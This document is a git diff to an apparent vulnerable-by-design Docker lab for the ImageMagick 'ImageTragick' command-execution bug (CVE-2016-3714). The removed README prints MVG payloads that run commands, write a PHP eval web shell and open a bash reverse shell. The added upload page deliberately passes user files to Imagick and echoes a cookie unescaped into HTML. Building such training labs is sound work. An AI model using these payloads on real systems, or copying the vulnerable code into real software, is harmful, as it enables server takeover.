diff --git a/i/imagemagick/1/Dockerfile b/i/imagemagick/1/Dockerfile
index c1895d0..f66c023 100644
--- a/i/imagemagick/1/Dockerfile
+++ b/i/imagemagick/1/Dockerfile
@@ -1,4 +1,4 @@
-FROM medicean/vulapps:base_lamp
+FROM madhatter37/vulnerable_apps:base_lamp_1.0.0
 
 COPY src/ImageMagick-6.7.9-10.tar.gz /tmp/ImageMagick-6.7.9-10.tar.gz
 COPY src/imagick-3.3.0.tar.gz /tmp/imagick-3.3.0.tar.gz
@@ -12,11 +12,13 @@ RUN set -x \
     && tar -zxf /tmp/imagick-3.3.0.tar.gz -C /var/www/ \
     && tar -zxf /tmp/re2c-0.13.7.5.tar.gz -C /var/www/
 
-COPY src/phpinfo.php /var/www/html/phpinfo.php
-COPY src/testimag.php /var/www/html/testimag.php
-COPY src/poc.php /var/www/html/poc.php
+RUN mkdir /var/www/html/file_upload
+RUN mkdir /var/www/html/file_upload/form
+RUN mkdir /var/www/html/uploads
 COPY src/index.php /var/www/html/index.php
-COPY src/poc.png /poc.png
+COPY src/poc.php /var/www/html/file_upload/poc.php
+COPY src/upload.php /var/www/html/file_upload/form/upload.php
+COPY src/default.png /var/www/html/uploads/default.png
 
 RUN set -x \
     && chown -R www-data:www-data /var/www/html/ \
@@ -55,4 +57,4 @@ COPY src/start.sh /start.sh
 RUN chmod a+x /start.sh
 
 EXPOSE 80
-CMD ["/start.sh"]
+CMD ["/start.sh"]
\ No newline at end of file
diff --git a/i/imagemagick/1/src/default.png b/i/imagemagick/1/src/default.png
new file mode 100644
index 0000000..376cc86
Binary files /dev/null and b/i/imagemagick/1/src/default.png differ
diff --git a/i/imagemagick/1/src/index.php b/i/imagemagick/1/src/index.php
index 69863dc..13973c5 100644
--- a/i/imagemagick/1/src/index.php
+++ b/i/imagemagick/1/src/index.php
@@ -1,439 +1,3 @@
-<!DOCTYPE html><html>
-
-<head>
-<meta charset="utf-8">
-<title>README</title>
-<style type="text/css">
-body {
-  font-family: Helvetica, arial, sans-serif;
-  font-size: 14px;
-  line-height: 1.6;
-  padding-top: 10px;
-  padding-bottom: 10px;
-  background-color: white;
-  padding: 30px; }
-
-body > *:first-child {
-  margin-top: 0 !important; }
-body > *:last-child {
-  margin-bottom: 0 !important; }
-
-a {
-  color: #4183C4; }
-a.absent {
-  color: #cc0000; }
-a.anchor {
-  display: block;
-  padding-left: 30px;
-  margin-left: -30px;
-  cursor: pointer;
-  position: absolute;
-  top: 0;
-  left: 0;
-  bottom: 0; }
-
-h1, h2, h3, h4, h5, h6 {
-  margin: 20px 0 10px;
-  padding: 0;
-  font-weight: bold;
-  -webkit-font-smoothing: antialiased;
-  cursor: text;
-  position: relative; }
-
-h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
-  background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
-  text-decoration: none; }
-
-h1 tt, h1 code {
-  font-size: inherit; }
-
-h2 tt, h2 code {
-  font-size: inherit; }
-
-h3 tt, h3 code {
-  font-size: inherit; }
-
-h4 tt, h4 code {
-  font-size: inherit; }
-
-h5 tt, h5 code {
-  font-size: inherit; }
-
-h6 tt, h6 code {
-  font-size: inherit; }
-
-h1 {
-  font-size: 28px;
-  color: black; }
-
-h2 {
-  font-size: 24px;
-  border-bottom: 1px solid #cccccc;
-  color: black; }
-
-h3 {
-  font-size: 18px; }
-
-h4 {
-  font-size: 16px; }
-
-h5 {
-  font-size: 14px; }
-
-h6 {
-  color: #777777;
-  font-size: 14px; }
-
-p, blockquote, ul, ol, dl, li, table, pre {
-  margin: 15px 0; }
-
-hr {
-  background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
-  border: 0 none;
-  color: #cccccc;
-  height: 4px;
-  padding: 0;
-}
-
-body > h2:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-body > h1:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-  body > h1:first-child + h2 {
-    margin-top: 0;
-    padding-top: 0; }
-body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
-  margin-top: 0;
-  padding-top: 0; }
-
-a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
-  margin-top: 0;
-  padding-top: 0; }
-
-h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
-  margin-top: 0; }
-
-li p.first {
-  display: inline-block; }
-li {
-  margin: 0; }
-ul, ol {
-  padding-left: 30px; }
-
-ul :first-child, ol :first-child {
-  margin-top: 0; }
-
-dl {
-  padding: 0; }
-  dl dt {
-    font-size: 14px;
-    font-weight: bold;
-    font-style: italic;
-    padding: 0;
-    margin: 15px 0 5px; }
-    dl dt:first-child {
-      padding: 0; }
-    dl dt > :first-child {
-      margin-top: 0; }
-    dl dt > :last-child {
-      margin-bottom: 0; }
-  dl dd {
-    margin: 0 0 15px;
-    padding: 0 15px; }
-    dl dd > :first-child {
-      margin-top: 0; }
-    dl dd > :last-child {
-      margin-bottom: 0; }
-
-blockquote {
-  border-left: 4px solid #dddddd;
-  padding: 0 15px;
-  color: #777777; }
-  blockquote > :first-child {
-    margin-top: 0; }
-  blockquote > :last-child {
-    margin-bottom: 0; }
-
-table {
-  padding: 0;border-collapse: collapse; }
-  table tr {
-    border-top: 1px solid #cccccc;
-    background-color: white;
-    margin: 0;
-    padding: 0; }
-    table tr:nth-child(2n) {
-      background-color: #f8f8f8; }
-    table tr th {
-      font-weight: bold;
-      border: 1px solid #cccccc;
-      margin: 0;
-      padding: 6px 13px; }
-    table tr td {
-      border: 1px solid #cccccc;
-      margin: 0;
-      padding: 6px 13px; }
-    table tr th :first-child, table tr td :first-child {
-      margin-top: 0; }
-    table tr th :last-child, table tr td :last-child {
-      margin-bottom: 0; }
-
-img {
-  max-width: 100%; }
-
-span.frame {
-  display: block;
-  overflow: hidden; }
-  span.frame > span {
-    border: 1px solid #dddddd;
-    display: block;
-    float: left;
-    overflow: hidden;
-    margin: 13px 0 0;
-    padding: 7px;
-    width: auto; }
-  span.frame span img {
-    display: block;
-    float: left; }
-  span.frame span span {
-    clear: both;
-    color: #333333;
-    display: block;
-    padding: 5px 0 0; }
-span.align-center {
-  display: block;
-  overflow: hidden;
-  clear: both; }
-  span.align-center > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px auto 0;
-    text-align: center; }
-  span.align-center span img {
-    margin: 0 auto;
-    text-align: center; }
-span.align-right {
-  display: block;
-  overflow: hidden;
-  clear: both; }
-  span.align-right > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px 0 0;
-    text-align: right; }
-  span.align-right span img {
-    margin: 0;
-    text-align: right; }
-span.float-left {
-  display: block;
-  margin-right: 13px;
-  overflow: hidden;
-  float: left; }
-  span.float-left span {
-    margin: 13px 0 0; }
-span.float-right {
-  display: block;
-  margin-left: 13px;
-  overflow: hidden;
-  float: right; }
-  span.float-right > span {
-    display: block;
-    overflow: hidden;
-    margin: 13px auto 0;
-    text-align: right; }
-
-code, tt {
-  margin: 0 2px;
-  padding: 0 5px;
-  white-space: nowrap;
-  border: 1px solid #eaeaea;
-  background-color: #f8f8f8;
-  border-radius: 3px; }
-
-pre code {
-  margin: 0;
-  padding: 0;
-  white-space: pre;
-  border: none;
-  background: transparent; }
-
-.highlight pre {
-  background-color: #f8f8f8;
-  border: 1px solid #cccccc;
-  font-size: 13px;
-  line-height: 19px;
-  overflow: auto;
-  padding: 6px 10px;
-  border-radius: 3px; }
-
-pre {
-  background-color: #f8f8f8;
-  border: 1px solid #cccccc;
-  font-size: 13px;
-  line-height: 19px;
-  overflow: auto;
-  padding: 6px 10px;
-  border-radius: 3px; }
-  pre code, pre tt {
-    background-color: transparent;
-    border: none; }
-
-sup {
-    font-size: 0.83em;
-    vertical-align: super;
-    line-height: 0;
-}
-* {
-    -webkit-print-color-adjust: exact;
-}
-@media screen and (min-width: 914px) {
-    body {
-        width: 854px;
-        margin:0 auto;
-    }
-}
-@media print {
-    table, pre {
-        page-break-inside: avoid;
-    }
-    pre {
-        word-wrap: break-word;
-    }
-}
-</style>
-</head>
-<body>
-<h2 id="toc_0">ImageMagick 命令执行漏洞（CVE-2016–3714）环境</h2>
-
-<h3 id="toc_1">说明</h3>
-
-<p>感谢 <a href="https://github.com/justkg">@justkg</a> 提供原始环境。</p>
-
-<h3 id="toc_2">漏洞信息</h3>
-
-<ul>
-<li><a href="https://imagetragick.com/">ImageMagick Is On Fire — CVE-2016–3714</a></li>
-<li><a href="http://pastebin.com/aE4sKnCg">ImageMagick: Multiple vulnerabilities in image decoder</a></li>
-<li><a href="http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462424557950">Write Up: Remote Command Execute in Wordpress 4.5.1</a></li>
-</ul>
-
-<p>5月3日，ImageMagick官方披露称，目前ImageMagick存在一处远程命令执行漏洞（CVE-2016–3714），当其处理的上传图片带有攻击代码时，可被远程执行任意代码，进而导致攻击者控制服务器。</p>
-
-<p>ImageMagick是一款开源图片处理库，支持 PHP、Ruby、NodeJS 和 Python 等多种语言，使用非常广泛。包括 PHP imagick、Ruby rmagick 和 paperclip 以及 NodeJS imagemagick 等多个图片处理插件都依赖它运行。</p>
-
-<h3 id="toc_3">漏洞相关代码</h3>
-
-<p>ImageMagick 在 <code>MagickCore/constitute.c</code> 的 <code>ReadImage</code> 函数中解析图片，如果图片地址是 <code>https://</code> 开头的，即调用 InvokeDelegate。</p>
-
-<p><code>MagickCore/delegate.c</code> 定义了委托，<a href="https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L99">第 99 行</a>定义了要执行的命令。</p>
-
-<pre><code class="language-none">99    &quot;  &lt;delegate decode=\&quot;https\&quot; command=\&quot;&amp;quot;wget&amp;quot; -q -O &amp;quot;%o&amp;quot; &amp;quot;https:%M&amp;quot;\&quot;/&gt;&quot;</code></pre>
-
-<p>最终 <code>InvokeDelegate</code> 调用 <a href="https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L407"><code>ExternalDelegateCommand</code> 执行命令</a>。</p>
-
-<pre><code class="language-none">#if !defined(MAGICKCORE_HAVE_EXECVP)
-  status=system(sanitize_command);
-#else
-  if ((asynchronous != MagickFalse) ||
-      (strpbrk(sanitize_command,&quot;&amp;;&lt;&gt;|&quot;) != (char *) NULL))
-    status=system(sanitize_command);
-  else
-    {
-      pid_t
-        child_pid;
-</code></pre>
-
-<h3 id="toc_4">镜像信息</h3>
-
-<p>本镜像中提供了本地测试 PoC 和 远程测试 PoC</p>
-
-<table>
-<thead>
-<tr>
-<th style="text-align: center">类型</th>
-<th style="text-align: center">值</th>
-</tr>
-</thead>
-
-<tbody>
-<tr>
-<td style="text-align: center">开放端口</td>
-<td style="text-align: center">80</td>
-</tr>
-<tr>
-<td style="text-align: center">远程 PoC</td>
-<td style="text-align: center">/poc.php</td>
-</tr>
-</tbody>
-</table>
-
-<h3 id="toc_5">获取环境:</h3>
-
-<ol>
-<li><p>拉取镜像到本地</p>
-
-<pre><code class="language-none">$ docker pull medicean/vulapps:i_imagemagick_1</code></pre></li>
-<li><p>启动环境</p>
-
-<pre><code class="language-none">$ docker run -d -p 8000:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1</code></pre>
-
-<blockquote>
-<p><code>-p 8000:80</code> 前面的 8000 代表物理机的端口，可随意指定。 </p>
-</blockquote></li>
-</ol>
-
-<h3 id="toc_6">使用与利用</h3>
-
-<p>访问 <code>http://你的 IP 地址:端口号/</code></p>
-
-<h3 id="toc_7">PoC 与 Exp 使用</h3>
-
-<h4 id="toc_8">本地测试</h4>
-
-<p>在容器中 <code>/poc.png</code> 文件内容如下：</p>
-
-<pre><code class="language-none">push graphic-context
-viewbox 0 0 640 480
-fill &#39;url(https://evalbug.com/&quot;|ls -la&quot;)&#39;
-pop graphic-context</code></pre>
-
-<p>构建时已经集成在容器中，可手动修改第 3 行的命令。</p>
-
-<p>在物理机上直接执行下面命令验证漏洞：</p>
-
-<pre><code class="language-none">$ docker exec i_imagemagick_1 convert /poc.png 1.png</code></pre>
-
-<p>或进入 docker容器 shell 中执行：</p>
-
-<pre><code class="language-none">$ convert /poc.png 1.png</code></pre>
-
-<p>如果看到 <code>ls -al</code> 命令成功执行，则存在漏洞。</p>
-
-<h4 id="toc_9">远程命令执行测试</h4>
-
-<p>远程命令执行无回显，可通过写文件或者反弹 shell 来验证漏洞存在。</p>
-
-<ol>
-<li><p>写一句话到网站根目录下：</p>
-
-<pre><code class="language-none">push graphic-context
-viewbox 0 0 640 480
-fill &#39;url(https://example.com/1.jpg&quot;|echo \&#39;&lt;?php eval($_POST[\&#39;ant\&#39;]);?&gt;\&#39; &gt; shell.php&quot;)&#39;
-pop graphic-context</code></pre></li>
-<li><p>反弹 shell:</p>
-
-<pre><code class="language-none">push graphic-context
-viewbox 0 0 640 480
-fill &#39;url(https://example.com/1.jpg&quot;|bash -i &gt;&amp; /dev/tcp/192.168.1.101/2333 0&gt;&amp;1&quot;)&#39;
-pop graphic-context</code></pre></li>
-</ol>
-
-<p>将上述两个 Exp 经过 base64 编码后发送到远程 <code>poc.php</code>，querystring 的 <code>key</code> 为 <code>img</code>。</p>
-
-<p>也可修改 <code>poc.py</code> 后执行。</p>
-
-
-</body>
-
-</html>
+<?php
+header("Location: file_upload/poc.php");
+?>
\ No newline at end of file
diff --git a/i/imagemagick/1/src/phpinfo.php b/i/imagemagick/1/src/phpinfo.php
deleted file mode 100644
index 5b63fb8..0000000
--- a/i/imagemagick/1/src/phpinfo.php
+++ /dev/null
@@ -1,3 +0,0 @@
-<?php
-phpinfo()
-?>
diff --git a/i/imagemagick/1/src/poc.php b/i/imagemagick/1/src/poc.php
index 69cbe3b..8dcae56 100644
--- a/i/imagemagick/1/src/poc.php
+++ b/i/imagemagick/1/src/poc.php
@@ -1,25 +1,17 @@
 <?php
-function readImageBlob() {
-    $base64 = "iVBORw0KGgoAAAANSUhEUgAAAM0AAAD
- NCAMAAAAsYgRbAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5c
- cllPAAAABJQTFRF3NSmzMewPxIG//ncJEJsldTou1jHgAAAARBJREFUeNrs2EEK
- gCAQBVDLuv+V20dENbMY831wKz4Y/VHb/5RGQ0NDQ0NDQ0NDQ0NDQ0NDQ
- 0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0PzMWtyaGhoaGhoaGhoaGhoaGhoxtb0QGho
- aGhoaGhoaGhoaGhoaMbRLEvv50VTQ9OTQ5OpyZ01GpM2g0bfmDQaL7S+ofFC6x
- v3ZpxJiywakzbvd9r3RWPS9I2+MWk0+kbf0Hih9Y17U0nTHibrDDQ0NDQ0NDQ0
- NDQ0NDQ0NTXbRSL/AK72o6GhoaGhoRlL8951vwsNDQ0NDQ1NDc0WyHtDTEhD
- Q0NDQ0NTS5MdGhoaGhoaGhoaGhoaGhoaGhoaGhoaGposzSHAAErMwwQ2HwRQ
- AAAAAElFTkSuQmCC";
-    if(isset($_POST['img'])){
-        $base64 = $_POST['img'];
-    }
-    $imageBlob = base64_decode($base64);
-
-    $imagick = new Imagick();
-    $imagick->readImageBlob($imageBlob);
-
-    header("Content-Type: image/png");
-    echo $imageBlob;
+$cookie_name = 'image_path';
+$default_path = '../uploads/default.png';
+if (!isset($_COOKIE[$cookie_name])) {
+        setcookie($cookie_name,$default_path, time() + (86400*30),"/");
 }
-readImageBlob();
-?>
\ No newline at end of file
+?>
+<html>
+<body>
+Thumbnail: <img src="<?=$_COOKIE[$cookie_name]?>"><br>
+<form action="form/upload.php" method="post" enctype="multipart/form-data">
+Upload a file: <input type="file" name="upfile"><br>
+Check if a valid image <input type="checkbox" name="check_valid_image" value="true"><br>
+<input type="submit" name="submit" value="Submit">
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/i/imagemagick/1/src/poc.png b/i/imagemagick/1/src/poc.png
deleted file mode 100644
index c4f8640..0000000
--- a/i/imagemagick/1/src/poc.png
+++ /dev/null
@@ -1,4 +0,0 @@
-push graphic-context
-viewbox 0 0 640 480
-fill 'url(https://evalbug.com/"|ls -la")'
-pop graphic-context
diff --git a/i/imagemagick/1/src/testimag.php b/i/imagemagick/1/src/testimag.php
deleted file mode 100644
index ea3ce49..0000000
--- a/i/imagemagick/1/src/testimag.php
+++ /dev/null
@@ -1,9 +0,0 @@
-<?php
-$im = new Imagick();
-$im->newPseudoImage(100, 100, "magick:rose");
-$im->setImageFormat("png");
-$im->roundCorners(5,3);
-$type=$im->getFormat();
-header("Content-type: $type");
-echo $im->getimageblob();
-?>
\ No newline at end of file
diff --git a/i/imagemagick/1/src/upload.php b/i/imagemagick/1/src/upload.php
new file mode 100644
index 0000000..326a35d
--- /dev/null
+++ b/i/imagemagick/1/src/upload.php
@@ -0,0 +1,35 @@
+<?php
+$target_dir = $_SERVER['DOCUMENT_ROOT']."/uploads/";
+$target_file = $target_dir . basename($_FILES['upfile']['name']);
+$uploadOk = 1;
+$imageFileType = strtolower(pathinfo(basename($_FILES['upfile']['name']),PATHINFO_EXTENSION));
+if(isset($_POST['submit'])) {
+	if(isset($_POST['check_valid_image'])) {
+		$check = getimagesize($_FILES['upfile']['tmp_name']);
+		if($check !== false) {
+		       echo "File is an image - " . $check['mime']."<br>";
+		       $uploadOk = 1;
+		} else {
+		       echo "File is not an image."."<br>";
+		       $uploadOk = 0;
+		}
+	}
+        if ($imageFileType != "png" && $imageFileType != "jpg" && $imageFileType != "jpeg" && $imageFileType != "gif") {
+                echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed"."<br>";
+                $uploadOk = 0;
+        }
+        if ($uploadOk == 0) {
+                echo "Sorry, your file was not uploaded."."<br>";
+        } else {
+                $image = new Imagick($_FILES['upfile']['tmp_name']);
+                $image->thumbnailImage(100,100);
+                if ($image->writeImage($target_file)) {
+                        setcookie('image_path',$target_file);
+                        echo "The file ". basename($_FILES['upfile']['name']). " has been uploaded to " . $target_file."<br>";
+                } else {
+                        echo "Sorry, there was an error uploading your file."."<br>";
+                }
+        }
+}
+?>
+<a href="poc.php">Return to main</a>